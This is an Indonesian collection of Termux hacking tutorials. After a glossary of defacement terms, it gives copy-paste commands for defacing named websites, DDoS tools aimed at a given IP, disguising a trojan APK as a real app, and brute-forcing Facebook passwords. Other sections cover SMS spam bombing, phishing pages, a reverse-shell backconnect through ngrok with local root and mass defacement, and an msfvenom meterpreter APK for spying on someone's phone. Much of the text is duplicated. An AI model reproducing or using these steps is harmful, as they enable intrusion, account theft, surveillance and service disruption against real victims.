Boleh berteman di dunia maya,tapi tau akan batasan . jangan sampai kamu anggap teman di dunia maya adalah segalanya. memang tidak semua orang berhati busuk,tapi gak semua orang berhati baik walau kelihatan baik.selalu waspada dengna orang jahat yang memanfaatkan kerpercayaan yang kita berikan.
Done.

ASLI DAN TERPERCAYA : PENGERTIAN Deface, Shell Backdoor, Vulnerabilty, Exploit Dork, Bruto force, Mass deface, POC (proof of concept),Jumping/symlink

Deface
Deface adalah kegiatan mengubah atau mengganti halaman, atau menitipkan sebuah file kedalam website orang lain dengan memanfaatkan sebuah celah.

Defacer
Defacer adalah orang yang melakukan deface. Defacer juga bisa disebut Attacker

Shell Backdoor
Shell Backdoor adalah sekumpulan perintah dalam bentuk script, dengan shell defacer bisa megubah, mengganti, menambahkan ataupun menghapus sebuah file tanpa harus login dulu di cpanel atau pun login page admin, tapi tidak 100% dapat melakukan semua itu karena biasanya chmod/permissions nya di kunci).


Website victim
Website victim adalah website yang akan di deface atau telah di deface. Bisa disebut Korban :V

Vulnerabilty
Vulnerability bermakna bahwa website korban mempunyai kesalahan, mempunyai celah (bug) sehingga si defacer tadi bisa masuk kedalam sistem website.

Exploit
Exploit adalah kode program yang memanfaatkan kesalahan(bug/vuln) dari sebuah web hingga memungkinkan si attacker masuk kedalam web. Exploit biasanya digunakan untuk melakukan  penentrasi baik secara legal ataupun ilegal untuk mencari kelemahan (Vulnerability) pada server.

Dork
Dork adalah proses pencarian menggunakan search engine (google/bing dll) namun dengan hasil yang lebih spesifik. Sederhananya dengan dork menggunakan kata yang tepat kita bisa lebih mudah menemukan apa yang kita cari.

Bruto force
Brute Force adalah Teknik untuk masuk kedalam sebuah akun dengan cara menebak nebak username dan passwordnya.
Rooting Server
Rooting Server adalah proses untuk mendapatkan hak akses tertinggi (root) dari sebuah server.

Mass deface
Mass Deface Adalah deface masal yang biasanya terjadi ketika kita bisa melakukan rooting server atau kebetulan ada web yang satu direktori dengan web yang sudah kita masuki.



Jumping/symlink
Seperti yang sudah di jelaskan sebelumnya bahwa dalam server itu terdapat banyak website dan tiap website itu berbeda direktori, nah jumping adalah berpindah website ke dalam dir website lain yang readalbe ( bisa di baca) . tujuanya untuk mendapatkan file konfigurasi dari website yang bersangkutan , jumping sendiri bisa di lakukan di dalam shell. sedangkan symlink mengalihkan folder root kedalam suatu folder jadi kita bisa melihat isi dari web nya dengan mengunjungi folder yang di pindahkan tadi.

POC (proof of concept)
Poc adalah sebuah metode yang dipakai oleh defacer untuk menanam shell backdoor di website
Soceng (social engginering)
Soceng adalah teknik untuk mendapatkan informasi/hal yang dibutuhkan dari seseorang dengan cara memanfaatkan media sosial dan kecakapan dalam berbicara.

Mirror
Mirror bisa juga disebut archive website yang di deface oleh defacer.

Soof ( Show Of )
Soof adalah kegiatan memamerkan website yang telah dideface. para defacer biasanya soof di media sosial.

ASLI DAN TERPERCAYA :DEFACE DI ANDROID VIA TERMUX

DEFACE VIA TERMUX

Install python dan para pkg
Seperti pkg install curl dan python2 dan lain lain
LALU KETIK;
curl -T/(tempat script disimpan)/(nama script) (nama website)
Contoh;

curl -T/sdcard/index.html http://ratia.co.za

Setelah itu tunggu dan selesai
BUKA WEBSITE DENGAN AKHIR /(nama script kamu)

ASLI DAN TERPERCAYA :TUTORIAL HACKING ANDROID: DEFACE TERMUX METODE WEBDAV

pkg update -y
pkg install wget
pkg install python2
pip2 install urllib3 charder certifi idna request
pkg install openssl curl
pkg install libcurl
mkdir webdav.py
cd /sdcard
cp index.html $HOME/webdav
cd
cd webdav
python2 webdav.py http://loushifashion.com index.html
curl -f  /storage/emulated/0/index.html http://loushifashion.com/

ASLI DAN TERPERCAYA :HACKING DI ANDROID TOOL TERMUX UNTUK HACKING. HACK FB.

TOOL TERMUX
Cara Install D-tect tool di android termux (command ) :

$ apt install git
$ apt install python2
$ git clone https://github.com/shawarkhanethicalhacker/D-TECT
$ ls
$ cd D-TECH
$ chmod +x d-tect.py
$ python2 d-tect.py

cara uninstall tool termux
rm -rf toolsnya

cara buat virus
cd /sdcard
cd vbug
ls
chmod vbug.py
chmod -v vbug.py
python2 vbug.py



irssi
/connet irc.freenode.net
/nick w3wandroid
/join #modol
_________
DDOS via Termux
1. Hammer
$ pkg update (tekan enter)
$ pkg upgrade (tekan enter)
$ pkg install python (tekan enter)
$ pkg install git (tekan enter)
$ git clone https://github.com/cyweb/hammer (tekan enter)
$ cd hammer (tekan enter)
$ python hammer.py (tekan enter)
$ python hammer.py -s [IP target] -p [port] -t 135 (tekan enter) 104.27.146.125

2. Xerxes
$ apt install git
$ apt install clang
$ git clone https://github.com/zanyarjamal/xerxes
$ ls
$ cd xerxes
$ ls
$ clang xerxes.c -o xerxes
$ ls
$ ./xerxes (nama website) 80

3. Torshammer
$ pkg update
$ pkg install git
$ apt install tor
$ pkg install python2
$ git clone https://github.com/dotfighter/torshammer.git
$ ls
$ cd torshammer
$ python2 torshammer.py

4. liteDDOS
$ apt update
$ apt upgrade
$ pkg install git
$ pkg install python2
$ git clone https://github.com/4L13199/LITEDDOS
$ cd LITEDDOS
$ python2 liteDDOS.py

_______________
Bermain moon-buggy
$ pkg install moon-buggy
$ moon-buggy

______________
musikan di termux
$ pkg install mpv
$ mpv/sdcard/lagu.mp3
/sdcard/ bisa di ganti sesuai letak musik

______________
Browsing di termux
$ pkg install w3m
$ w3m www.google.com
Linknya bsa diubah

______________
Telephone di termux
$ pkg install termux-api
$ termux-telephony-call nomornya

_____________
Menampilkan animasi kereta :v
$ pkg install su
$ sl

_____________
menampilkan ikon dan informasi sistem android
$ pkg install neofetch
$ neofetch

_____________
menampilkan teks dalam format ASCII
$ pkg install figlet
$ figlet masukin teksnya

_____________
$ pip install mps_youtube
$ pip install youtube_dl
$ apt install mpv
$ mpsyt
$ /judul lagu
Tinggal pilih lagu dgn mengetik nomornya.


Tutorial membuat virus seperti aplikasi aslinya🚨
Tools yang dibutuhkan: APK Editor & tool vbug
APK Editor bisa didownload di playstore
Tool vbug https://www.mediafire.com/file/6hs6y71ryw10uvw/vbug.zip

1. Download tool vbugnya dulu
2. Taruh file tool vbug di luar folder pada memori internal
3. Buka termux lalu $ cd /sdcard
4. $ unzip vbug.zip
5. $ cd vbug
6. $ python2 vbug.py
7. Enter
8. Ketik 10
9. Ketik E
10. Aplikasi virusnya sudah jadi
Setelah aplikasinya jad kita tinggal edit supaya mirip aslinya
1. Buka APK Editor
2. Klik Select an Apk File
3. Pilih aplikasi virus tadi
4. Klik full edit
5. Pada bagian kolom app_name tulis nama aplikasi yang kalian inginkan
6. Lalu klik files
7. Klik res/drawable
8. Logo yang kedua itu ganti dengan logo aplikasi yang kalian inginkan
Catatan: format logo harus .png
9. Ceklist logo yang kedua lalu replace
10. Pilih file logo yang mau dijadikan logo aplikasi agan
11. Back sampai home
Supaya aplikasi terlihat lebih nyata kita harus beri bobot pada aplikasi buatan kita
12. Klik tanda plus yang ada di bawah kiri, pilih file, lagu, gambar atau apapun yang coxok sebagai bobot apliaksi agan
13. Klik build
14. Tunggu hingga selesai
15. Jadi deh


auto boot fb
git clone https://github.com/Senitopeng/BotFbBangDjon.git
cd BotFbBangDjon
python2 bangdjon.py
melihat id fb
https://findmyfbid.in/


git clone https://github.com/tomiashari/fb-autoreaction.git

cd fb-autoreaction
python2 fb-autoreaction



cara membuat virus
cd Vbug/vbug.py
cd /storage/emulated/0/Vbug
cd vbug
Python2 vbug.py

CRACK PASSWORD HASH
git clone https://github.com/FajriHidayat088/FHX-Hash-Killer/
cd FHX-Hash-Killer
python2 FHXHashKiller.py

git clone https://github.com/UltimateHackers/Hash-Buster
$ cd Hash-Buster
$ python2 hash.py



pkg install irssi
irssi (enter)
/connect chat.freenode.net
/nick oki
/join #mrmaze



Cara install Metasploit di termux (No Root)
~ apt update && apt upgrade
~ apt install curl
~ curl -LO https://raw.githubusercontent.com/Hax4us/Metasploit_termux/master/metasploit.sh
~ chmod +x metasploit.sh
~ ./metasploit.sh
... Tunggu proses instalasi sekitar 30-40 menit tergantung koneksi internet ...


( hack fb via termux )
$apt update
$apt upgrade
$apt install python2
$apt install python2-dev
$apt install wget
$dip2 install mechanize
$cd/sterage/emulated/0
$python2 fbbrute.py ( yg tdi di download di tunda di luar folder )
$storage/emulated/0/fassword.txt ( sama kya yang tadi di download trus tinda di luar folder )
=tinggal tunggu fassword nya muncul
Jika beruntung
silahkan mencoba

tool install
$ apt update && apt upgrade
$ apt install git
$ git clone https://github.com/aryanrtm/4wsectools
cd 4wsectools
chmod 777 tools
./tools


pip install mps_youtube
pip install youtube_dl
apt install mpv
mpsyt
/judul

$ pkg update && pkg upgrade
CHATTING VIA TERMUX
$ pkg install irssi
$ irssi
$ /connect chat.freenode.net
$ /nick 1235
12345 di ganti sesuai nama/nick agan
$ /join #XCAteam

100% work boom spam
apt upgrade && apt update
apt install git
git clone https://github.com/Amriez/gcospam
cd gcospam
sh install.sh
sh gco.sh
Pilih nomer yang mana ajjh
Lalu
Masukan nomer tanpa 0/
Input bebas
Jeda default ajjhj


Spam bom mall
$ pkg install update
$ pkg install upgrade

$ pkg install wget
$ pkg install php
$ wget http://files-store.theprivat.ml/uploads/bom-mall.zip
$ unzip bom-mall.zip
$ cd bom-mall
$ php run.php

(Install SpamTsel)
$ pkg install curl
$ pkg install php
$ curl -s http://files-store.theprivat.ml/uploads/bombtsel.txt > bombtsel.php
$ chmod 777 bombtsel.php
$ php bombtsel.php
3) Tool Spam LITESPAM
$ pkg install php
$ pkg install toilet
$ pkg install sh
$ pkg install git
$ git clone https://github.com/4L13199/LITESPAM
$ cd LITESPAM
$ sh LITESPAM.sh atau
bash LITESPAM.sh
Masukan Nomer nya...




VBugMaker Termux
-apt update && apt upgrade

-apt install git

-apt install python

Donwload file ->http://upfile.mobi/YGwg8gQLuvv

Pindah ke directory

Next

-unzip vbug.zip

-mv vbug $HOME

-cd vbug

-ls

-chmod +x vbug.py

-python2 vbug.py

#Done
Cara Root Server Di Termux Dengan Ngrok Perl/PHP BackConnecter Mass Deface.
1. Install~ Buka Termux

2. Install Ngrok Registrasi Autthokennya.
(http://ngrok.com/download;http://ngrok.com/signup)
$ wget https://bin.equinox.io/c/4VmDzA7iaHb/ngrok-stable-linux-arm.zip
$ unzip ngrok-stable-linux-arm.zip ngrok
$ ./ngrok authtoken JWJDKNxxxxxxxxxx
$ ./ngrok tcp port
:~# Welcome : Plan Free
"0.tcp.ngrok.io:port-ngrok ~> localhost:port"
3. Download Perl/PHP Backconnecter

(http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet)
dan Edit file nya, cari $ip dan $port ganti dengan (0.tcp.ngrok.io:port-ngrok)
~>Upload ke website (PERL: ON)(PHP: ON)
5. in termux command :
$ nc -lnvp port
6. in backdoor shell :
$ perl perl-reverse-shell.pl
(atau)
> http://situs.co.li/perl-reverse-shell.php
(Run the script simply by browsing to the newly uploaded file in your web browser)

.----(after backconnect successfully)---

7. upload LOCALROOT
$ wget https://domain.com/localroot/dirty
$ chmod 777 dirty
$ ./dirty
New password: ndasmu
(successfully rooted)
8. import TTY shell
===>jika menggunakan dirty<===
$ echo "import pty; pty.spawn('/bin/bash')" > /tmp/sad.py
$ python /tmp/sad.py
===>jika menggunakan cowroot<===
$ python -c 'import pty;pty.spawn("/usr/bin/passwd")'
(https://evertpot.com/189/)
.--------------------------------------------
9. login as ROOT
$ su rintoar
Password: ndasmu
.--------------------------------------------
10 ./mass (https://m.youtube.com/watch?v=HPQQok40v78)
.--------------------------------------------



WEEMAN [✓]
apt update && apt upgrade -y
apt install git -y
apt install python2 -y
git clone https://github.com/evait-security/weeman
cd weeman
chmod 777 weeman.py
python2 weeman.py
Ex
set url http://facebook.com
set action_url http://facebook.com
run

_______________

Hunner framework
apt update
apt install python
apt install git -y
git clone https://github.com/b3-v3r/Hunner
cd Hunner
chmod 777 hunner.py
python hunner.py
_______________

SQLMAP [✓]

apt update
apt install python
apt install python2
apt install git
git clone https://github.com/sqlmapproject/sqlmap
cd sqlmap
Python2 sqlmap.py
__
Exemplo
Python2 sqlmap.py -u website –dbs
-D acuart –tables
-D acuart -T users –columns
-D acuart -T users -C name,email,phone -dump
_____________
DDOS XERXES [✓]
clang xerxes.c -o xerxes
./xerxes website 80
_____________

DDOS TORSHAMMER [✓]
apt-get update
apt-get install python2
apt-get install tor
apt-get install git
git clone https://github.com/dotfighter/torshammer.git
cd torshammer
python2 torshammer.py -T -t website

_____________

BRUTEFORCE [✓]
apt update
apt upgrade
apt install python
apt install pip
pip install wordlist
apt install worlist
Wordlist -h
cd /sdcard
Cat pas.txt
_____________

Localizar ip
Apt install python git
git clone https://github.com/maldevel/IPGeoLocation.git
cd IPGeoLocation
chmod +x ipgeoLocation.py
pip install -r requirements.txt
python ipgeolocation.py -m
python ipgeolocation.py -t http://www.google.com
_____________

Hecker RECONDOG
apt update
apt install python python2
apt install git
git clone https://github.com/UltimateHackers/ReconDog
cd ReconDog
chmod +x dog.py
Python2 dog.py
_____________

BUSCA PAINEL ADM DE SITE
pkg install git
git clone https://github.com/Techzindia/admin_penal
cd admin_penal
chmod +x admin_panel_finder.py
python2 admin_panel_finder.py
_____________


HAKKU
apt install pytho
apt install git
mkdir vasu
git clone https://github.com/4shadoww/hakkuframework
cd hakkuframework
chmod +x hakku
python hakku
show modules
use whois
show options
set target examplesite.com
run

_______________

RED HAWK
apt update
apt install git
git clone https://github.com/Tuhinshubhra/RED_HAWK
cd RED_HAWK
chmod +x rhawk.php
apt install php
ls
php rhawk.php

_______________

D-TECT
apt update
apt install git
git clone https://github.com/shawarkhanethicalhacker/D-TECT
cd D-TECT
apt install python2
chmod +x d-tect.py
python2 d-tect.py
examplesite.com
_______________

viSQL
apt update
apt install python2
apt install git
git clone https://github.com/blackvkng/viSQL
cd viSQL
python2 -m pip install -r requirements.txt
python2 viSQL.py
python2 viSQL.py -t http://www.bible-history.com
______

Hash Buster
apt update
apt upgrade
apt install python2
apt install git
git clone https://github.com/UltimateHackers/Hash-Buster
cd Hash-Buster
python2 hash.py

PERKIRAAN cuaca
curl http://wttr.in/ (lokasi)

tool Routersploit
apt install git
apt install python2
pip2 install requests
git clone https://github.com/reverse-shell/routersploit.git
cd routersploit
pip install -r requirements.txt
termux-fix-shebang rsf.py


Cara pake
cd routersploit
./ rsf.py
use scanners/autopwn
show options
set target 192.168.1.1
set port 8080
set threads 10
masukkan exploitsnya
set target 192.168.1.1
-check
-run


tool ubuntu
$ apt update
$ apt install git
$ apt install wget
$ apt install proot
$ git clone https://github.com/Neo-Oli/termux-ubu…
$ cd termux-ubuntu
$ chmod +x ubuntu.sh
$ ./ubuntu.sh
$ ./start.sh



(Install Weeman )
$ apt update && apt upgrade -y
$ apt install git -y


$ apt install python2 -y
$ git clone https://github.com/evait-security/weeman
$ cd weeman
$ chmod 777 weeman.py
$ python2 weeman.py

Contoh
$ set url http://facebook.com
$ set action_url http://facebook.com
run
(Bisa diganti phising nya, kalau Twitter ya bisa ataupun yg lain)

Ikuti Langkah Demi Langkah

(`Install Hunner framework)
$ apt update
$ apt install python
$ apt install git -y
$ git clone https://github.com/b3-v3r/Hunner
$ cd Hunner
$ chmod 777 hunner.py
$ python hunner.py



Ikuti Langkah Demi Langkah

(Install SQLMAP)

$ apt update
$ apt install python
$ apt install python2
$ apt install git
$ gi clone https://github.com/sqlmapproject/sqlmap
$ cd sqlmap
$ Python2 sqlmap.py
Exemple:-

Python2 sqlmap.py -u website --dbs
-D acuart --tables
-D acuart -T users --columns
-D acuart -T users -C name,email,phone -dump

Ikuti Langkah Demi Langkah

Lacak ip
git clone https://github.com/maldevel/IPGeolocation
cd IPGeolocation
chmod +x ipgeolocation.py
pip install -r requirements.txt
python ipgeolocation.py -m
python ipgeolocation.py -t IP yang ingin dilacak


bbom spam
apt upgrade && apt update
apt install git
git clone https://github.com/Amriez/gcospam
cd gcospam
sh install.sh
sh gco.sh
Pilih nomer yang mana ajjh
Lalu
Masukan nomer tanpa 0/62
Input bebas
Jeda default ajjh

---------------------------------------------------------------------
*1.Spammer SMS Grab
Install Spammernya dulu*
$pkg install python2
$pip2 install requests
$pkg install git
$git clone https://github.com/p4kl0nc4t/Spammer-Grab
$cd Spammer-Grab
$ls
$chmod +x spammer.py
$python2 spammer.py --delay 30 nomor korban.

---------------------------------------------------------------------------------------
Cara Install Lazymux di Termux

$ pkg update && upgrade
$ pkg install python2
$ pkg install git
$ git clone https://github.com/Gameye98/Lazymux
$ cd Lazymux
$ chmod +x lazymux.py
$ python2 lazymux.py

---------------------------------------------------------------------------------------
2.Cara install tools daijobu
Fungsinya nanti liat sendiri lah di dalem tools nya
$apt upgrade && apt update
$apt install php
$apt install git
Kalo udah selesai langsung masukan git nya dengan perintah
$git clone https://github.com/alintamvanz/diejoubu
$cd diejoubu
$cd v1.2
$php diejoubu.php

---------------------------------------------------------------------------------------

3. Install webdav

$ apt update && upgrade
$ apt install python2
$ pip2 install urllib3 chardet certifi idna requests
$ apt install openssl curl
$ pkg install libcurl
$ ln -s /sdcard
$ cd sdcard
$ mkdir webdav
$ cd webdav
$ curl -k -O https://pastebin.com/raw/HnVyQPtR
$ mv HnVyQPtR webdav.py
$ python2 webdav.py

---------------------------------------------------------------------------------------

2. Xerxes
$ apt install git
$ apt install clang
$ git clone https://github.com/zanyarjamal/xerxes
$ ls
$ cd xerxes
$ ls
$ clang xerxes.c -o xerxes
$ ls
$ ./xerxes (nama website) 80

---------------------------------------------------------------------------------------
3. Torshammer
$ pkg update
$ pkg install git
$ Pkg install tor
$ pkg install python2
$ git clone https://github.com/dotfighter/torshammer.git
$ ls
$ cd torshammer
$ python2 torshammer.py -T -t seword.com ( web yang kalian attack )TOOL TERMUX
Cara Install D-tect tool di android termux (command ) :

$ apt install git
$ apt install python2
$ git clone https://github.com/shawarkhanethicalhacker/D-TECT
$ ls
$ cd D-TECH
$ chmod +x d-tect.py
$ python2 d-tect.py

cara uninstall tool termux
rm -rf toolsnya

cara buat virus
cd /sdcard
cd vbug
ls
chmod vbug.py
chmod -v vbug.py
python2 vbug.py



irssi
/connet irc.freenode.net
/nick w3wandroid
/join #modol
_________
DDOS via Termux
1. Hammer
$ pkg update (tekan enter)
$ pkg upgrade (tekan enter)
$ pkg install python (tekan enter)
$ pkg install git (tekan enter)
$ git clone https://github.com/cyweb/hammer (tekan enter)
$ cd hammer (tekan enter)
$ python hammer.py (tekan enter)
$ python hammer.py -s [IP target] -p [port] -t 135 (tekan enter) 104.27.146.125

2. Xerxes
$ apt install git
$ apt install clang
$ git clone https://github.com/zanyarjamal/xerxes
$ ls
$ cd xerxes
$ ls
$ clang xerxes.c -o xerxes
$ ls
$ ./xerxes (nama website) 80

3. Torshammer
$ pkg update
$ pkg install git
$ apt install tor
$ pkg install python2
$ git clone https://github.com/dotfighter/torshammer.git
$ ls
$ cd torshammer
$ python2 torshammer.py

4. liteDDOS
$ apt update
$ apt upgrade
$ pkg install git
$ pkg install python2
$ git clone https://github.com/4L13199/LITEDDOS
$ cd LITEDDOS
$ python2 liteDDOS.py

_______________
Bermain moon-buggy
$ pkg install moon-buggy
$ moon-buggy

______________
musikan di termux
$ pkg install mpv
$ mpv/sdcard/lagu.mp3
/sdcard/ bisa di ganti sesuai letak musik

______________
Browsing di termux
$ pkg install w3m
$ w3m www.google.com
Linknya bsa diubah

______________
Telephone di termux
$ pkg install termux-api
$ termux-telephony-call nomornya

_____________
Menampilkan animasi kereta :v
$ pkg install sl
$ sl

_____________
menampilkan ikon dan informasi sistem android
$ pkg install neofetch
$ neofetch

_____________
menampilkan teks dalam format ASCII
$ pkg install figlet
$ figlet masukin teksnya

_____________
$ pip install mps_youtube
$ pip install youtube_dl
$ apt install mpv
$ mpsyt
$ /judul lagu
Tinggal pilih lagu dgn mengetik nomornya.


Tutorial membuat virus seperti aplikasi aslinya🚨
Tools yang dibutuhkan: APK Editor & tool vbug
APK Editor bisa didownload di playstore
Tool vbug https://www.mediafire.com/file/6hs6y71ryw10uvw/vbug.zip

1. Download tool vbugnya dulu
2. Taruh file tool vbug di luar folder pada memori internal
3. Buka termux lalu $ cd /sdcard
4. $ unzip vbug.zip
5. $ cd vbug
6. $ python2 vbug.py
7. Enter
8. Ketik 10
9. Ketik E
10. Aplikasi virusnya sudah jadi
Setelah aplikasinya jad kita tinggal edit supaya mirip aslinya
1. Buka APK Editor
2. Klik Select an Apk File
3. Pilih aplikasi virus tadi
4. Klik full edit
5. Pada bagian kolom app_name tulis nama aplikasi yang kalian inginkan
6. Lalu klik files
7. Klik res/drawable
8. Logo yang kedua itu ganti dengan logo aplikasi yang kalian inginkan
Catatan: format logo harus .png
9. Ceklist logo yang kedua lalu replace
10. Pilih file logo yang mau dijadikan logo aplikasi agan
11. Back sampai home
Supaya aplikasi terlihat lebih nyata kita harus beri bobot pada aplikasi buatan kita
12. Klik tanda plus yang ada di bawah kiri, pilih file, lagu, gambar atau apapun yang coxok sebagai bobot apliaksi agan
13. Klik build
14. Tunggu hingga selesai
15. Jadi deh


auto boot fb
git clone https://github.com/Senitopeng/BotFbBangDjon.git
cd BotFbBangDjon
python2 bangdjon.py
melihat id fb
https://findmyfbid.in/


git clone https://github.com/tomiashari/fb-autoreaction.git

cd fb-autoreaction
python2 fb-autoreaction



cara membuat virus
cd Vbug/vbug.py
cd /storage/emulated/0/Vbug
cd vbug
Python2 vbug.py

CRACK PASSWORD HASH
git clone https://github.com/FajriHidayat088/FHX-Hash-Killer/
cd FHX-Hash-Killer
python2 FHXHashKiller.py

git clone https://github.com/UltimateHackers/Hash-Buster
$ cd Hash-Buster
$ python2 hash.py



pkg install irssi
irssi (enter)
/connect chat.freenode.net
/nick oki
/join #mrmaze



Cara install Metasploit di termux (No Root)
~ apt update && apt upgrade
~ apt install curl
~ curl -LO https://raw.githubusercontent.com/Hax4us/Metasploit_termux/master/metasploit.sh
~ chmod +x metasploit.sh
~ ./metasploit.sh
... Tunggu proses instalasi sekitar 30-40 menit tergantung koneksi internet ...


( hack fb via termux )
$apt update
$apt upgrade
$apt install python2
$apt install python2-dev
$apt install wget
$dip2 install mechanize
$cd/sterage/emulated/0
$python2 fbbrute.py ( yg tdi di download di tunda di luar folder )
$storage/emulated/0/fassword.txt ( sama kya yang tadi di download trus tinda di luar folder )
=tinggal tunggu fassword nya muncul
Jika beruntung
silahkan mencoba

ASLI DAN TERPERCAYA :Tutorial Instal tools pelindung Profile Facebook 2018 TERMUX

Tutorial Instal tools pelindung Profile Facebook 2018 :)

Pertama Buka termux lalu ketik perintah di bawah ini :

$ pkg update -y
$ pkg upgrade -y
$ pkg install python -y
$ pkg install python2 -y
$ pkg install git -y
$ pkg install curl -y
$ pkg install php -y
$ pkg install ulang -y
$ git clone https://github.com/jaxBCD/FBshield
$ cd FBshield
$ python2 guard.py


Jangan Di Perjualkan Tools Ini

ASLI DAN TERPERCAYA :Cara Remote Hp Orang Lain Dengan Termux

Cara Remote Hp Orang Lain Dengan Termux*
$ ls
$ cd metasploit-framework
$ ls
$ ruby msfvenom -p android/meterpreter/reverse_tcp LHOST=10.32.140.70 LPORT=4444 R> /sdcard/HackTools.APK

TUNGGU PROSES PEMBUATAN APK SELESAI

$ ./msfconsole (TUNGGU PROSES PENGHIDUPAN METASPLOIT)
$ use exploit/multi/handler
$ set payload android/meterpreter/reverse_tcp
$ set lhost 10.32.140.70
$ set lport 4444
$ exploit
Share Apknya
Klo apk keinstall Trus Di Buka Maka Bisa kita Sadap

ASLI DAN TERPERCAYA :KUMPULAN KODE COMMAND PROMPT A-Z LENGKAP

KUMPULAN KODE COMMAND PROMPT A-Z LENGKAP
A
Ø ADDUSERS : Tambah daftar pengguna untuk / dari file CSV
Ø ARP : Address Resolution Protocol
Ø Assoc : Ubah ekstensi file asosiasi
Ø ASSOCIAT : Salah satu langkah asosiasi file
Ø Attrib : Ubah atribut berkas
B
Ø Bootcfg : Edit Windows boot settings
Ø BROWSTAT : Dapatkan domain, info browser dan PDC
C
Ø CACLS : Ubah file permissions
Ø CALL : Panggil satu program batch yang lain
Ø CD : Mengganti Directory – pindah ke Folder tertentu
Ø Change : Ganti Terminal Server Session properties
Ø CHKDSK : Check Disk – memeriksa dan memperbaiki masalah disk
Ø CHKNTFS : Periksa sistem file NTFS
Ø CHOICE : Menerima input keyboard ke sebuah file batch
Ø CIPHER : Encrypt atau Decrypt file / folder
Ø CleanMgr : Ototmatis membersihkan Temperatur file, recycle bin
Ø CLEARMEM : Hapus kebocoran memori
Ø CLIP : Salin STDIN ke Windows clipboard.
Ø CLS : Menghapus layar (Clear The Screen)
Ø CLUSTER : Windows Clustering
Ø CMD : Start a new CMD shell
Ø COLOR : Mengubah warna dari jendela CMD
Ø COMP : Membandingkan isi dari dua file atau set file
Ø COMPACT : Compress file atau folder pada partisi NTFS
Ø Compress : Compress tunggal file pada partisi NTFS
Ø CON2PRT : Menghubungkan atau memutuskan sambungan dengan Printer
Ø CONVERT : Konversi FAT ke drive NTFS
Ø COPY : Menyalin satu atau lebih file ke lokasi lain
Ø CSCcmd : clien-side caching (Offline Files)
Ø CSVDE : Impor atau Ekspor Active Directory data
D
Ø DATE : Display atau mengatur tanggal
Ø Defrag : Defragment hard drive
Ø DEL : Menghapus satu atau lebih file
Ø DELPROF : Hapus profil pengguna NT
Ø DELTREE : Menghapus folder dan semua subfolder
Ø DevCon : Device Manager Command Line Utility
Ø DIR : Menampilkan daftar file dan folder
Ø DIRUSE : Tampilkan penggunaan disk
Ø DISKCOMP : Bandingkan isi dua floppy disk
Ø Diskcopy : Salin isi dari satu disket ke yang lain
Ø DISKPART : Disk Administrasi
Ø DNSSTAT : DNS Statistik
Ø DOSKEY : Edit baris perintah, ingat perintah, dan membuat macro
Ø DSADD : Tambah User (komputer, group ..) ke direktori aktif
Ø DSQUERY : Daftar item dalam direktori aktif
Ø DSMOD : Ubah user (computer, group ..) di direktori aktif
Ø DSRM : Hapus item dari Active Directory
E
Ø ECHO : Menampilkan pesan di layar
Ø ENDLOCAL : Akhir localisation perubahan lingkungan dalam file batch
Ø ERASE : Menghapus satu atau lebih file
Ø EVENTCREATE : Tambahkan pesan ke Windows event log
Ø EXIT : Keluar dari skrip arus / rutin dan menetapkan errorlevel
Ø EXPAND : uncompress file
Ø Ekstrak : uncompress file CAB
F
Ø FC : Bandingkan dua file
Ø FIND : Mencari string teks dalam sebuah file
Ø FINDSTR : Cari string dalam file
Ø FOR / F : pengulangan perintah terhadap satu set file
Ø FOR / F : pengulangan perintah terhadap hasil perintah lain
Ø FOR : pengulangan perintah terhadap semua options Files, Directory, List
Ø FORFILES : Proses Batch beberapa file
Ø FORMAT : Format disk
Ø FREEDISK : Periksa free disk space/disk yang tersisa (dalam bytes)
Ø FSUTIL : File dan Volume utilitas
Ø FTP : File Transfer Protocol
Ø FTYPE : Tampilkan atau memodifikasi jenis file yang digunakan dalam asosiasi ekstensi file
G
Ø GLOBAL : Display keanggotaan kelompok global
Ø GOTO : Direct a batch program untuk melompat ke baris berlabel
Ø GPUPDATE : Update pengaturan Kebijakan Grup
H
Ø HELP : Online Help
I
Ø ICACLS : Ubah file dan folder permissions
Ø IF : kondisional melakukan perintah
Ø IFMEMBER : Apakah pengguna saat ini dalam sebuah NT Workgroup
Ø IPCONFIG : Configure IP
K
Ø KILL : Remove program dari memori
Ø LABEL : Edit disk label
Ø LOCAL : Display keanggotaan kelompok-kelompok lokal
Ø LOGEVENT : Menulis teks ke NT event viewer
Ø Logoff : user log off
Ø LOGTIME : log tanggal dan waktu dalam file
M
Ø MAPISEND : Kirim email dari baris perintah
Ø MBSAcli : Baseline Security Analyzer
Ø MEM : Display penggunaan memori
Ø MD : Buat folder baru
Ø MKLINK : Buat link simbolik (linkd)
Ø MODE : Mengkonfigurasi perangkat sistem
Ø MORE : Display output, satu layar pada satu waktuV

ASLI DAN TERPERCAYA :TOOLS TERMUX INSTALL A-Rat


:-=INSTALL A-Rat-=:
$ apt update && apt upgrade
$ pkg install git
$ pkg install python2
$ git clone https://github.com/Xi4u7/A-Rat.git
$ cd A-Rat
$ python2 A-Rat.py

ASLI DAN TERPERCAYA :100+ TOOLS TERMUX

Biar Semua Tau Tutorial Berikut
Sedikit nya Membantu Para Pemula

Hack fb cracker

Bahan:apk termux diplaystore hp android versi 5.0



Download file:
Fbbrute.py : http://upvid.mobi/4wz9u6eNniz
Pasword: http://upfile.mobi/CqZSn5e7hwc








$apt update
$apt upgrade
$apt install python2
$apt install python2-dev
$apt install wget
$pip2 install mechanize
$cd /storage/sdcard0
$cd /sdcard
$cd /storage/emulated/0
$python2 fbbrute.py

MASUKAN ID KORBAN
CONTOH (100006541234567)

$/sdcard/password.txt
Hack wifi wpa/wpa2 psk harus root



Download file: https://github.com/esc0rtd3w/wifi-hacker


$apt update
$apt upgrade
$pkg install git
$git clone https://github.com/esc0rtd3w/wifi-hacker
$cd wifi-hacker
$chmod +x wifi-hacker.sh
$./wifi-hacker.sh
Nyalakan wifinya lalu lanjutkan
$y
$2
Sms spammer

Dowload file: https://github.com/Kizukaa/SpammerSMS











$pkg install git
$pkg install python2
$pip2 install requests
$git clone https://github.com/Kizukaa/SpammerSMS
$cd SpammerSMS
________
TUTORIAL install nethunter
________
$ apt update
$ apt install git
$ git clone https://github.com/Hax4us/Nethunter-In-Termux.git
$ cd Nethunter
$ Is
$ chmod +x kalinethunter
$ ./kalinethunter
$ ./startkali.sh
enjoy

_________
TUTORIAL melacak secara detail
_________
$ apt update
$ apt upgrade
$ pkg install python
$ pkg install git
$ git clone https://github.com/maldevel/IPGeoLocation
$ Is
$ cd IPGeoLocation
$ is
$ chmod +x ipgeolocation.py
$ Is
$ pip install -r repuirements.txt
$ python ipgeolocation.py -m
